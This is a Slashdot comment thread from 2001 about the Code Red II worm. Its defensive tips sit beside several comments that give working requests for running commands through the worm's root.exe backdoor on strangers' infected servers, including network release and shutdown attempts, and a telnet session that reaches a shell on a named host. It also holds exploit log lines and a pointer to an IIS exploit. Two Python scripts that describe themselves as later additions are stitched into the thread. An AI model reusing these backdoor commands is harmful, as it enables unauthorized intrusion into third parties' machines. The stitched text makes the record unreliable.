  182. Working PHP counter by Heretic2 · · Score: 1

    Yeah, so, I noticed on my 20 IP multi-homed linux server I was getting a lot of hits, so here's my answer. Notice the confirmation log.

    Now what's the W2K command to change the IP to 10.1.2.3?

  183. Logging the worm by The_Weevil · · Score: 1

    I am currently logging the attacks on my btopenworld ADSL box by using a dummy default.ida script.

    The results are on display here (until my dyndns changes).

    Viral code sent is stored in my database and different code variants are logged. I only started logging today.

    It is obvious from the stats that V2 is enjoying bt openworld's subnet very much, since all my attacks so far have come from within there.

    Weevil

    --
    ghaa.
    1. Re:Logging the worm by The_Weevil · · Score: 1

      It wasn't difficult. I just told apache to execute all .ida files in public_html as if they were perl scripts (by setting the ExecCGI flag for *.ida).

      Then I placed a dummy default.ida in there, so whenever the worm tries to attack it the attempt is logged to a mysql database. Releasing the code would be tricky as you'd also need to set up the database, which would be a right nightmare but mail me if you're serious and I'll send you a copy. It ain't pretty.

      I also pushed the boat out after realising how many v2 attacks I was getting and created a /scripts/root.exe script too, to log 1337 h4x0rs trying to get into my non-existent win2k server :)

      On the COX front, from what I've been able to gather the codered II virus spreads predominantly over subnets. If my logging in the past few days is anything to go by, v1 is as good as dead, but the far more virulent v2 is busy infecting all win2k machines on its particular subnet; notice how many attacks I got from other BT Openworld customers. This sounds like exactly the problem your co-worker is seeing.

      I'm not sure I want to be slashdotted, but the URL that will bounce you to my gateway and these logs is: www.baxpace.com/gateway -- you'll have to copy and paste it if you're seriously interested. Hey, I still want to be able to get online :).

      Soon I'll add a frequency chart to it so that I can see how the level of attacks per hour is changing since logging began.

      Thanks for the interest
      Weevil

      --
      ghaa.
  184. This looks big time by JerkyBoy · · Score: 2, Informative

    Holy crap. http://www.msnbc.com/news/606910.asp

    --


    Always do right. This will gratify some people and astonish the rest. -- Mark Twain
    1. Re:This looks big time by pdcull · · Score: 1

      REFORMATTING ONLY CURE

      In his analysis, Cooper said the only way victims can reclaim a compromised system is to reformat it, essentially wiping it clean. That's because there's no way to tell if a vulnerable computer has been implanted with other back doors.

      He forgot the phrase "and install a more secure operating system" right after the bit about reformatting the infected system.

    2. Re:This looks big time by Dr.+A.+van+Code · · Score: 1
      "One guy posted to the DShield.org mailing list that he installed IIS Win2k from scratch. To be safe, he had his server disconnected from the Net, but had to connect it to download the patches," Ullrich said. "During the 45 seconds it took him to download the patches he was infected."

      Excuse me? If he knew of the danger, WHY THE HELL did he have IIS running when he connected to the net to get the patches?? Did he think he needed the web _server_ running in order to use the web _browser_??

      --
      Good mfences make good neighbors.
  185. affects every email user? by gimpboy · · Score: 1

    how does sircam affect every email user? shouldn't you say it affects every outlook user who has scripting enabled and is ignorant enough to open attachments they are not expecting?

    personally i think a root exploit that is broadcast to everyone on your subnet is worse. especially if your subnet is on @home.

    --
    -- john
    1. Re:affects every email user? by Chris+Johnson · · Score: 2
      I'd say having hundreds of megabytes to download over a 56K modem constitutes 'affecting' me :P

      I send you this file to have your advice!

  186. It's easy to secure your IIS.. by Telek · · Score: 1
    When I first installed my server, I decided to tie it down, and here's what I did:

    • Changed the user that IIS ran under to a dummy user that only has READ access to the scripts directory and any other directory that it needs access to, and specifically granted WRITE access to places that it needed to write to, and NO access to the rest of the system
    • Removed all mappings that I wasn't using
    • placed a fake CMD.EXE in the scripts directory that I wrote that SMS'ed me with information whenever it was executed (and the directory was read only anyways so you couldn't overwrite it). This was fun, because as soon as someone tries to execute the cmd.exe, it fails and emails me about the attempt.

    So after the code-red and the other one a while back came out, I found out about it as soon as the first attack hit my system (via email) and then checked my logs and was pleased to see many attempts, but no change at all. I'm not trying to be arrogant here, I just wanted to point out that it is possible to secure your IIS (or any system for that matter) so that stupid bugs won't compromise your system.
    --

    If God gave us curiosity
  187. This is just the first wave by analog_line · · Score: 1
    Though admittedly it's coming along a lot faster than most. What we have here boys and girls are our own little hacker nanites. How long before a version of this comes out exploiting a security flaw where there is no patch for it? How long until a version comes out that tries more than one vulnerability?

    As a certain commercial operating system gets more and more bloated, larger and larger files are less noticed. How long before a 1-2MB virus with a couple dozen attack types built in starts making the rounds?

  188. This is old news... by jezerbel · · Score: 1

    I know, I know - but seriously: I had to patch this on our Win2k machine back in March/April - I'm presuming that this is the Solaris/Windows thing (site must have been slashdotted) or a variant of (forgive my ignorance if I'm wrong). Either way it overwrote the default pages and gave the user some system access - using echo commands to write to files etc... now where was that freakin' link to prove it...

    Either way this was what the server logs looked like..

    /msadc/../../../../../../winnt/system32/cmd.exe /c+dir+..\ 200 0 871 99 70 HTTP/1.0 - - - -
    /msadc/../../../../../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 0 401 129 90 HTTP/1.0 - - - -

    somebody tell me if this is a different bug (but even so the exploit looks similar...)

    1. Re:This is old news... by jezerbel · · Score: 1

      He he, I believe it was the Printer exploit - quite true.. You don't have to worry about me keeping the server patched - it's all in the bag - and no, I'm not MSCE so my authority on the subject may be questionable... thanks for the correction.

    2. Re:This is old news... by jad0 · · Score: 1

      There was a very similar exploit out in 99, I only remember the year because there was a 'client' for it called NCX99 - I can't remember where, who or why, but I've still got NCX99 lying around somewhere, it used exactly the same technique, buffer overflow with junk characters, then arbitrary code (on an htx file though IIRC).

      As far as I know, no one made a 'proper' self-replicating virus out of it though.

      --
      Jado
      http://www.jado.org

  189. Anti-Code Red Virus by dankjones · · Score: 1
    I've been thinking it would be pretty damn neat if some programmer out there who was fed up with all this Code Red hype wrote up an anti-code red virus that would track down all the infected servers clean them up and patch them, and then, on a certain date/time delete itself.

    It could be known as the "You're Welcome" virus.

    Unfortunately, I don't know diddly-shit about it.

  190. 213.77.4.237 has been attacking me and by ssimpson · · Score: 2

    ....proudly sports the "Powered by Win2000 Server logo".

    I fucking know that you are running Win2k server, that's why you're infected with code red and attacking my poor linux box ;)


    --
    "Mary had a crypto key, she kept it in escrow, and everything that Mary said, the Feds were sure to know."
  191. potential for something worse by rips · · Score: 1

    If someone wrote a worm that maintained encrypted peer-to-peer connections between machines on arbitrary ports and a host routing table (gnutella style), this worm would suddenly shift shape into something potentially a lot worse.

    If this was then coupled with a self-propagating plug-in system requiring public-key encryption to install plug-in modules, the worm's creator could effectively initiate and propagate counter attacks and defensive measures.

    I find this an intriguing but incredibly scary concept.

  192. Re:Someone needs to write by spongman · · Score: 2
    sure, here's some javascript that'll do the same thing:
    var req=WScript.CreateObject ("MSXML2.XMLHTTP");
    req.open ("GET", WScript.Arguments (0), false, "", "");
    req.send ();
    WScript.Echo (req.responseText);
    for example, create a file 'get.js' with that script in it, and do 'cscript get.js "http://www.google.com"'. You could also do this from an ASP page. You might need to upgrade IE, or get the XML parser update from MS for this to work right.
  193. New Sites report on CR2 by stuccoguy · · Score: 4, Informative
    CNN has very little to say about the subject.

    MSNBC has a longer story.

    Fox News has a few words to say.

    ABC copied the AP story.

    CBS still seems to think the red tide is receding.

    Meanwhile the worm has knocked on my computer's door six times since I started this post. Uh, make that seven.

    1. Re:New Sites report on CR2 by GC · · Score: 1

      uh huh... I hear ya knocking, but ya can't come in... Apache... ya ya ya.

  194. My .02 by cyberwench · · Score: 2
    When he pled guilty, Mr. Butler admitted that he intentionally and without authorization accessed computers of the U.S. Department of Defense between approximately May 20, 1998, and May 26, 1998. Specifically, from his residence at the time in San Jose, he intentionally used computer programs which conducted automated, unauthorized system compromises on hundreds of computer systems, including the Department of Defense computers referred to above. When his automated attacks were successful, he obtained root (or superuser) access, then downloaded hacking tools to the target computer systems, and installed software which closed the holes he used to gain entry. The Department of Defense computers were exclusively for the use of the U.S. Government and were used in interstate and foreign commerce.

    While I realize that the press release is unlikely to cover his side of things, this doesn't sound like an equivalent situation. If you have more info, pass it along... I'm not familiar with the case and may be totally off-base. The primary difference seems to be that the other machines weren't attacking his.

    The idea of having machines do directed retaliation against attacks is something the government itself uses, as I believe do some companies. While I will grant that changing things on someone else's computer is on questionable ground, I also think that given the circumstances (a machine is attacking yours with a virus) you are probably on safe ground to respond. I think it would only be legal if it was in non-self-propagating form - that is, only used as an automatic response to an attack.

    That said, it would be a lot safer if you could filter out governmental IPs... those are the only ones that would be likely to cause any major fuss.

    --
    ~ Leilah
    1. Re:My .02 by camusflage · · Score: 2

      Another reply included a link to an article in Wired. Without having looked at it, it's probably a better version of the story.

      Max had a good idea. He got greedy though, and his counter-worm left a backdoor. Would they have pursued him as thoroughly if he hadn't left the backdoor? Likely, especially since he hit .mil systems.

      There's a difference between making a request to a server and getting its response, and making a malformed request to a server in the hope that it executes your code. Whether the code is benevolent or malicious, it's all the same. You're doing things to other peoples property that they neither ordinarily allow you to do nor ask you to do. Even with the best of intentions, you're still executing your code on someone else's system.

      "Oh, I'm sorry! You were saying about 'best intentions'? Oh, you're finished? Well, allow me to retort."

      --
      The truth about Scientology, Xenu, and you: Operation Clambake
  195. Exactly why you cannot trust the security by einhverfr · · Score: 2
    Of a compromised web server. With any version of such a worm, someone could write a script to infect all systems that hit their site with a backdoor either using the virus as an active client (as you have done) or the same vulnerability the virus exploits (we know it is vulnerable because we know it is infected).

    This is exactly why an infected server should be rebuilt and properly secured...

    --

    LedgerSMB: Open source Accounting/ERP
  196. Try this by jsse · · Score: 3, Informative

    jill.c. Don't regard it as a malicious exploit, it's in fact a very powerful remote administration tool. All our NT boxes are not attached to the Internet so we don't worry. :)

  197. Listen Code Red * authors! by jsse · · Score: 2

    Why don't you add a check to stay away from Apache servers?! The worm would be more difficult to trace without all those access.log evidence....

    You are overloading my /usr/log/apache man.

  198. They have to press charges. so can you! by darkharlequin · · Score: 1

    If they illegally accessed your machine first, that does not excuse them from liability. If I break into george's house and steal his gun, then use it to kill gene, george may have liability if he did not report the gun stolen.

    --
    i am so very tired....
  199. Automated notification script by the+way · · Score: 3, Interesting

    To automatically notify webmasters of infected sites, if you have mod_perl/Apache, use this script:

    http://forum.swarthmore.edu/epigone/modperl/nehzah prerm

    It identifies any attempt to access '/default.ida', looks up the MX records of the remote IP, and sends a notification to postmaster@. It is not a 'hack back', just a notification email.

  200. Getting mailbombed with sircam by zzyzx · · Score: 1

    Just in the last 12 hours, one person has sent me over 400 copies of this lovely virus. Anyone else just getting attacked?

  201. report report report! by shokk · · Score: 2
    Continue to mail in the suspected hosts...

    grep default.ida access_log* | mail -s 'APACHE' redalert@dshield.org
    so they can keep a count of the infections and see how the worm is propagating through the networks. I myself have been hit 154 times today, but that's a low number because my ISP made our cable modems go dynamic addressing recently. A link to the source code can be found on the page and here. Check frequently, as he updated the code a couple of revisions just today.

    --
    "Beware of he who would deny you access to information, for in his heart, he dreams himself your master."
  202. How to send a message to the poor bastards by Brian+Stretch · · Score: 4, Informative

    A user on grc.security (news.grc.com) suggested using the Windows "net send" command to send a pop-up message to the infected user. net.exe won't talk across the Internet, but you ought to be able to run the net.exe program on the rooted IIS box, something like:

    http://ipaddress/c/inetpub/scripts/root.exe?/c+n et +send+%25COMPUTERNAME%25+You+have+been+infected+by +the+Code+Red+II+Worm+which+attempted+to+attack+my +server

    %25COMPUTERNAME%25 translates to %COMPUTERNAME%, which returns the Windows hostname. I know that works from one of my failed attempts that gave me a reply, but with the above string, I get back a page with "Error in CGI Application" as
    the title:

    CGI Error

    The specified CGI application misbehaved by not returning a complete set
    of HTTP headers. The headers it did return are:

    and it doesn't give me any return. Can anyone verify and/or debug this? It *might* be working.

    The %USERDOMAIN% variable might be useful too, so you could send to the whole Windows domain, "Machine LUSER on DOOFUSDOMAIN is infected with Code Red II" or some such. %USERDOMAIN% is the machine name on systems on a workgroup.

    1. Re:How to send a message to the poor bastards by Fester213 · · Score: 2, Interesting

      I do something similar, except I pop up an IE window pointing to a page on a site I host explaining code red and how to fix it. I always get that CGI error, but my server logs report a hit from the infected host on my explanation page. So that error is perfectly normal - it's working.

      --

      -- Fester
      "Freedom is the freedom to say that two plus two make four. If that is granted, all else follows."
    2. Re:How to send a message to the poor bastards by Anonymous Coward · · Score: 1, Informative

      I had trouble getting root.exe to actually run any other program. I was able to execute commands interpreted by the shell (dir, echo, etc.), but not run any other program. The solution to this was to copy the program you want to run to the scripts directory ('copy' is a shell interpreted command), and then do a GET directly against the program, like so:

      GET /scripts/root.exe?+/c+copy+c:\winnt\system32\ipcon fig.exe+. HTTP/1.0
      GET /scripts/ipconfig.exe?+/release HTTP/1.0

      Something similar would probably be required to get net.exe to run. BTW, the above doesn't work to shut down their network. Apparently the scripts aren't run with enough permission to do that. Also tried the same with iisreset /stop.

    3. Re:How to send a message to the poor bastards by Brian+Stretch · · Score: 2

      I do something similar, except I pop up an IE window pointing to a page on a site I host explaining code red and how to fix it. I always get that CGI error, but my server logs report a hit from the infected host on my explanation page. So that error is perfectly normal - it's working.

      Great! One significant change has been suggested:

      telnet x.x.x.x 80
      GET /scripts/root.exe?/c+net+send+%2A+Machine+%25COMPU TERNAME%25+has+been+infected+by+the+Code+Red+II+wo rm+and+attacked+my+server HTTP/1.0

      %2A is *, which will send to all machines on a workgroup in a workgroup configuration, and I would presume all machines on a domain as well. This should be fairly easy to automate... but it's late, so I'll let someone else play with this.

  203. This just goes to show... by Refried+Beans · · Score: 1

    .. how MS software sucks.

    The worm should get 400 "Bad Request" on any HTTP server. That's not 404 "File not found." The worm has two spaces between the URL and the HTTP version. The spec says one and only one. So Apache, Zope, and any other sane HTTP server will throw out the request. Sure, it's a quick fix for both MS and the worm writer on this point, but still. RTFRFC!

  204. White Hat Hacking by Swaffs · · Score: 1

    Creating an Apache script that patches any infected hosts would be pretty cool, but I'll be impressed when someone writes a script that installs Linux/Apache on infected hosts.

    --
    "Karma can only be portioned out by the cosmos." - Homer Simpson [1F10]

  205. Re:Try pulling the IP up in your browser by Pathwalker · · Score: 2

    I've been having fun with that myself - I have a list of everyone who hit me here.
    Lots are home users who probably don't realize that they have IIS running, but there are a few sites that look like decent sized places.

  206. Log of any interest? by CaNuK · · Score: 1

    Some stats I ran to see how many times my personal firewall blocked access to my computer on port 80 on a daily basis. Just your typical computer with an always on connection. Very many of them originating from 24.*.*.* Oh, and there currently isn't (and won't be because who cares) a script for generating these. And I grabbed a username that's appropriate. I hope somebody cares. Wait, no I don't.

    --

    Despite the rising cost of living, it remains a popular activity.
  207. List of CodeRed IPs here by leonbrooks · · Score: 3, Informative
    This sorted list (updated hourly) contains the IPs for CodeRed attacks on a single IP address in Western Australia.

    Last week: 92

    Last 32 hours: 196 (175 unique addresses)

    Looks like it's concrete bunker time soon... )-:

    --
    Got time? Spend some of it coding or testing
  208. Microsoft Internet Pollution - My Server Log! by BigBlockMopar · · Score: 2

    Microsoft's products spew pollution into the information space like a burning mountain of tires.

    For sure! Take a look at my webserver (which pioneers the great new feature of a "Log File Chat Room" (tm 2001 Lawrence Wade)).

    This new variant seems to have been especially active, it's eating up a lot of my bandwidth. Last time, my IP address wasn't getting scanned as much as many other people I spoke with; I'm wondering if this one includes a better random number seed. I'm also seeing IIS victims from my ISP.

    Also, I wonder if a disclaimer stating that infected IIS servers are not allowed to visit my website would be sufficient to work towards suing Microsoft for their ongoing gross negligence and complicity causing material and financial damage.

    --
    Fire and Meat. Yummy.
    1. Re:Microsoft Internet Pollution - My Server Log! by Dr.+A.+van+Code · · Score: 1
      A glance at it shows that most of the hits are from Code Red III (XXXX rather than NNNN), the one that also tries to subvert cmd.exe and crack a shell. You should grep -c your logs for X's and N's; I'd be very interested in seeing what the relative frequency is of the variants.

      --
      Good mfences make good neighbors.
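The count the reply above asks for (grep -c for X's versus N's), together with the hits-and-unique-addresses figures comment 207 reports, as an added example written for this page rather than anything posted in the thread. It assumes Apache-style access logs and constructs its own sample lines, abbreviated so they fit; the N filler is the original Code Red request and the X filler the later variant, as the reply describes. Anchoring on the /default.ida path keeps a stray X or N elsewhere in a request from being counted, which a bare grep would not.

```python
import re
from collections import Counter, defaultdict

# Constructed sample in Apache common log format (not from the page or a real
# log).  Real worm requests carry a few hundred filler bytes before the
# %u-encoded payload; these are shortened to keep the lines readable.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Aug/2001:13:02:11 -0600] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801 HTTP/1.0" 400 334
10.0.0.9 - - [05/Aug/2001:13:05:40 -0600] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 400 334
10.0.0.9 - - [05/Aug/2001:14:17:02 -0600] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 400 334
192.0.2.77 - - [05/Aug/2001:14:20:59 -0600] "GET /index.html HTTP/1.1" 200 5120
10.0.0.12 - - [05/Aug/2001:14:21:03 -0600] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801 HTTP/1.0" 400 334
"""

# Source address, timestamp, then the quoted request line.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"')

# A worm probe is a GET for /default.ida followed by a run of one filler
# byte: N for the original Code Red, X for the later variant.
IDA_RE = re.compile(r'^GET /default\.ida\?(?P<fill>N{8,}|X{8,})')

def classify_request(request_line):
    """Return 'N' or 'X' for a Code Red probe, or None for anything else."""
    m = IDA_RE.match(request_line)
    if not m:
        return None
    return m.group("fill")[0]

def tally(log_text):
    """Count hits per variant and the unique source addresses per variant.

    Returns (hits, sources): hits is a Counter keyed 'N' / 'X', sources maps
    each variant to the set of IPs that sent it.
    """
    hits = Counter()
    sources = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # not a parseable access-log line
        variant = classify_request(m.group("req"))
        if variant is None:
            continue                      # ordinary traffic
        hits[variant] += 1
        sources[variant].add(m.group("ip"))
    return hits, sources

def hourly_buckets(log_text):
    """Hits per (variant, day-and-hour), for the hourly view comment 207 keeps."""
    buckets = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        variant = classify_request(m.group("req"))
        if variant is None:
            continue
        # "05/Aug/2001:13:02:11 -0600"[:14] -> "05/Aug/2001:13"
        buckets[(variant, m.group("ts")[:14])] += 1
    return buckets

if __name__ == "__main__":
    hits, sources = tally(SAMPLE_LOG)
    for v in ("N", "X"):
        print(f"variant {v}: {hits[v]} hits from {len(sources[v])} unique addresses")
    for (v, hour), n in sorted(hourly_buckets(SAMPLE_LOG).items()):
        print(f"{hour}  {v}  {n}")
```

Run it as `python3 codered_tally.py < /dev/null` against the built-in sample, or replace SAMPLE_LOG with the contents of your access log. Because the regex requires the filler to follow `/default.ida?`, a request that merely contains the letter X somewhere (a normal query string, say) is not counted, which is the false-positive a plain `grep -c X` would give.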
  209. Legal Issues Re: MS Liability For Wasted bandwidth by David+Hume · · Score: 1

    "Is there no way that companies could sue Microsoft due to loss of business / bandwidth charges, caused indirectly by poorly written software?"

    "Nope, look at your EULA"
    "Microsoft's EULA prohibits me from suing them for bandwidth charges for the stuff their crap throws at my Linux/Apache setup?"
    "Well, the EULA still applies :) You couldn't sue Microsoft, but you could sue the companies whose servers are infected (and hence spamming your box)."
    The statement that the "EULA still applies" is incorrect. The EULA is not binding on anyone who is not a party to the contract (i.e., the End User License Agreement). There is no privity of contract.

    Whether Microsoft could be sued under these circumstances raises an interesting, and to my knowledge unprecedented legal issue. It may be possible. One could assert a civil action for negligence. The plaintiffs would argue that but for Microsoft's negligence, they would not have incurred the bandwidth costs.

    Microsoft would, undoubtedly among other things, deny that it was negligent, and raise issues regarding proximate / legal cause, as well as intervening cause.

    Let me give you a *possibly* analogous example from the world of torts. You leave your keys in your car, and the doors unlocked. Perpetrator steals your car, is chased by the police, and runs over and kills a child. Perpetrator has no assets. The child's parents sue you for negligence for the wrongful death of their child. Result?

    If you say you are not liable, then add these facts. The evidence shows that: (a) you left your car in a horrible neighborhood where cars are routinely stolen; and (b) you knew this fact. Result?

    If you still say you are not liable, then add the fact that your car had itself been previously stolen on four occasions within the past year. Result?

    I wouldn't be surprised if a well-funded law firm filed a class action lawsuit against MS for negligence and other causes of action. It would be a reach, and very expensive, but the publicity and potential pay off might make it worth it.

  210. Better procmail filter! by BigBlockMopar · · Score: 2

    :0 B
    * > 100000
    * mDmcOaA5pDmoOaw5sDnAOeA56DnsOfA59Dn4Ofw5ADoEOgg6HDo8OkQ6SD
    /dev/null

    Okay. Forgive me if the syntax is off, I've never had to play with procmail filters. But it strikes me that this one would be significantly more useful:

    :0
    * ^X-Mailer:.*Outlook
    /dev/null

    :)

    --
    Fire and Meat. Yummy.
  211. Re:But is the fix freely available??? by omega9 · · Score: 1

    The patch is free. Think about it. We already know that Microsoft sucks, but charging for security patches would take them to a new plane of sucking.

    Could you imagine if it was run that way? "Yeah, we'll fix our (already) buggy server for you (that we charged you through the nose for). But it's gonna' cost you more."

    Omega9
    $chown us base

    --
    I'm against picketing, but I don't know how to show it.
  212. What do you do with that command prompt? by fanatic · · Score: 2
    telnet 216.227.114.45 80
    Trying 216.227.114.45...
    Connected to 216.227.114.45.
    Escape character is '^]'.
    GET /scripts/root.exe HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/4.0
    Date: Mon, 06 Aug 2001 03:23:07 GMT
    Content-Type: application/octet-stream
    Microsoft(R) Windows NT(TM)
    (C) Copyright 1985-1996 Microsoft Corp.

    C:\InetPub\scripts>

    So now that I've got this, what do I do? Entering commands (such as 'dir') hangs.
    --
    "that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
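An added check for the question in the post above, not code from the thread. root.exe is a copy of cmd.exe; started with no argument it waits for console input that IIS never connects to the socket, which is why typing `dir` into the telnet session goes nowhere and why the `?/c+command` form used elsewhere in this thread is the only way to get output back. The script below is meant for hosts you administer: it sends the same request the transcript shows, reads with a timeout instead of waiting for the connection to close, and classifies the reply. The sample replies are constructed from the transcript, not captured traffic.

```python
import re
import socket

def classify_response(raw):
    """Classify a raw HTTP reply to 'GET /scripts/root.exe HTTP/1.0'.

    'backdoor' : 200 plus cmd.exe output (NT banner or a C:\\...> prompt)
    'present'  : 200 but no recognisable shell output; inspect by hand
    'absent'   : any non-200 status, normally 404
    'unknown'  : not an HTTP reply at all
    """
    status_line = raw.split(b"\n", 1)[0].strip()
    parts = status_line.split()
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        return "unknown"
    if parts[1] != b"200":
        return "absent"
    text = raw.decode("latin-1")
    # The banner and prompt in the transcript; the regex catches a prompt on
    # any drive letter in case the copy lives somewhere other than C:.
    if "Microsoft(R) Windows" in text or re.search(r"(?m)^[A-Za-z]:\\[^\r\n]*>", text):
        return "backdoor"
    return "present"

def check_host(host, port=80, timeout=5.0, path="/scripts/root.exe"):
    """Probe a host you administer and classify what it sends back.

    cmd.exe with no arguments sits waiting for stdin, so the server never
    closes the connection; read until the socket times out instead of EOF.
    """
    request = f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")
    data = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                data += chunk
        except socket.timeout:
            pass                  # expected when root.exe is waiting on stdin
    return classify_response(data)

# Constructed reply modelled on the transcript above (not a capture).
SAMPLE_BACKDOOR_REPLY = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/4.0\r\n"
    b"Date: Mon, 06 Aug 2001 03:23:07 GMT\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"Microsoft(R) Windows NT(TM)\r\n"
    b"(C) Copyright 1985-1996 Microsoft Corp.\r\n"
    b"\r\n"
    b"C:\\InetPub\\scripts>"
)

# Constructed reply from a host that does not have the file.
SAMPLE_CLEAN_REPLY = b"HTTP/1.1 404 Object Not Found\r\nServer: Microsoft-IIS/4.0\r\n\r\n"

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(sys.argv[1], check_host(sys.argv[1]))
    else:
        print("sample backdoor reply ->", classify_response(SAMPLE_BACKDOOR_REPLY))
        print("sample clean reply    ->", classify_response(SAMPLE_CLEAN_REPLY))
```

A 'backdoor' result means the host has already been taken over, so deleting root.exe on its own is not a clean-up; the box needs the patch (and, as comment 220 notes, the service packs it depends on) and a rebuild from known-good media.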
  213. Re:Someone needs to write by DNS-and-BIND · · Score: 1

    wget isn't exactly what you could call a standard tool, much less on win32.

    --
    Shutting down free speech with violence isn't fighting fascism. It IS fascism!
  214. It's a Trilogy! by kermit1221 · · Score: 1

    Rules for successfully surviving a trilogy:

    Step 1: Don't run Microsoft servers (duh...)
    Step 2: ?
    Step 3: Repent! (if you ever ran an MS server)

  215. Work for the enemy... by Secret+Coward · · Score: 1
    A server at Randall Publishing has attacked my machine 16 times so far. I just sent in an application to work there. It says:

    Hi,

    I would like to work in your Information Technology department. The first thing I would do, is delete the Code Red worm from your web server, and apply a month-old patch to protect it from future exploits.

  216. Self Defense? by nettdata · · Score: 1

    I wonder if you could claim something like self-defense for something like this?

    I'm being actively attacked, multiple times, by someone elses hacked machine. That is an "unauthorized intrusion" attempt into my machine. If I go and perform an "unauthorized intrusion" on their machine in order to shut them down so as to protect my own services, why would I get in trouble for that?

    Sure, it's not like the guy tried to shoot me and I had to shoot back to protect myself, but it seems like a proportionate response to me.

    At least, that's MY way of thinking.

    --
    $0.02 (CDN)
  217. You think McDonalds is *wrong* to make hot coffee? by BigBlockMopar · · Score: 2

    The McDonald's coffee case judge was not braindead. Get the facts straight, they have been mentioned even here hundreds of times already. The coffee was hot enough to cause severe burns on contact, and McD knew it was so and they still sold the coffee at such temperature.

    You're kidding, right? I think you are, but I'm not sure. Okay. Well, I'll treat my response as if you're serious.

    I worked at a McDonalds, aeons ago, when I was in high school. Like, 1991. Probably when you were still in kindergarten.

    I worked there for four years. My first year, it was hell, I was minimum wage scum, but McDonalds is like the army: you get out of it exactly what you put into it.

    Well, I was nice with everyone, and I always arrived on time, and I always worked hard. And I was quickly awarded Employee of the Month. Less than a week after that, I was asked to come in for a staff meeting. I thought I was in trouble for something. All the managers sat me down very seriously, and asked me if I knew why I was there. They passed me a package and told me to sign for its receipt. I did, then I opened the package. It was a manager's uniform with my name on the little gold tag.

    I got to know a lot about McDonalds and its customers in the 3 years that followed. It was, believe it or not, a great job and I made a lot of friends working at McDonalds with whom I'm still in touch.

    As a part time ("Swing") manager, I got to help ensure that the restaurant ran smoothly. Ordering supplies, ensuring the staff have everything they need, resolving conflicts, assuring quality control, and dealing with customer complaints.

    One of the most common customer complaints was that the coffee was too cold. And yet, as part of my quality control role, I was responsible for ensuring that the temperatures on every cooking appliance were correct when I started my shift. The coffee, at the time, was to be kept at 85C.

    Now, of course, since some slovenly white trash got rich because of her own stupidity, I'm sure the customer complaints about cold coffee are even more common. From what I understand, the coffee is to be kept at 73C now.

    Of course it's hot. Coffee is supposed to be hot. Next thing is people will start suing over Eskimo Pie migraines they get when they drink their cold Coke too quickly.

    GM recently got sued for several billion dollars. It was Christmas Eve in about 1995 when this tragedy occurred. A family was riding along in their 1978 Chevy Malibu (already an old car). They were stopped at a red light, and a drunk driver hit them from behind. The car's gas tank exploded, and while the family were all conscious and relatively unhurt, when they got out, one of the kids had third degree burns to his leg. So they sued GM for faulty fuel tank design.

    Now, one thing about this case that terrifies me is that this was a 17-year-old car at the time of the accident. Who knows what nature of wear had been experienced? Rusted out gas tank? For all we know, this car shouldn't have been on the road to begin with.

    The other thing that terrifies me is that the jury wasn't allowed to hear how fast the vehicle that rear-ended them was travelling. Remember, they were stopped at a traffic light. They were hit by a drunk driver in a full-size pickup truck travelling at 75MPH. Approximately 120km/h.

    Changes things a little, doesn't it? How survivable is that accident?

    Rather than suing GM because a 17 year old car blew up when it was rear-ended by a 4,000lb mass travelling at 75MPH, I think I'd be writing a letter to GM to thank them for the fact that despite such a horrific accident, I still had both my kids.

    Your remark suggests a tacit support of the excessive litigation against businesses. My wish upon you is that you mortgage your house, open a business, and get sued by someone who gets a paper cut off your first invoice.

    --
    Fire and Meat. Yummy.
  218. AOL... by DraKKon · · Score: 1

    Thought you'd like this... AOL has been hit by the Code Red worm.. It's unconfirmed whether it's version 1 or 2, but Warner Brothers in the US and UK networks are down. AHHAHAHAHAHAH AOL SUCKS!

    --
    "It's not like your minds are as open as the source you love..." - Me to the majority of Slashdot.
  219. Non-English sites seem to be at more risk by leonbrooks · · Score: 2
    patch is available, MS patches known to cause other issues, we hear it

    A disproportionate number of the hits on my (Australian) web servers [sources] are from Asian countries, leading me to suspect that perhaps the non-English versions of the patch and/or some of the prerequisite Service Packs were released late and/or not as well publicised.

    If I was forced to ride shotgun on one of these security sieves, I'd be checking for patches twice daily. And I'd have the sucker behind a non-M$ reverse proxy.

    --
    Got time? Spend some of it coding or testing
  220. Disinfection is hard, need service packs by leonbrooks · · Score: 2
    Extra credit: Disinfect the machine with the security patch from the MS Web Site.

    Not so easy, the right service packs appear to be required first. So your little proggie would first have to determine what was needed, second download and install it all, then finally clean off the rootshell.

    --
    Got time? Spend some of it coding or testing
  221. Apache...probably redundant by Neoplasm · · Score: 1

    Checking some of the IP addresses in my firewall log, I'm getting the default web pages for Apache...even on Red Hat...is there some way that someone can change the pages on an infected machine? For example, check out http://209.5.115.231/ for example, or http://209.236.45.125/

    Confused@home

    --
    Do this don't do that Can't you redesign.
    1. Re:Apache...probably redundant by Neoplasm · · Score: 1

      God, I am such a doofus...ignore my comments above. There are so many "HTTP port probe" messages in my log that the garden variety RPC and TCP port probes got lost in the mess.

      --
      Do this don't do that Can't you redesign.
  222. Lobster?! *Whatever* you do... by Morbid+Curiosity · · Score: 1

    Don't put a lobster on a plate!
    He'll use his magnet to escape!
    He'll jump right up and claw your ear,
    And then he'll bite your EYE!
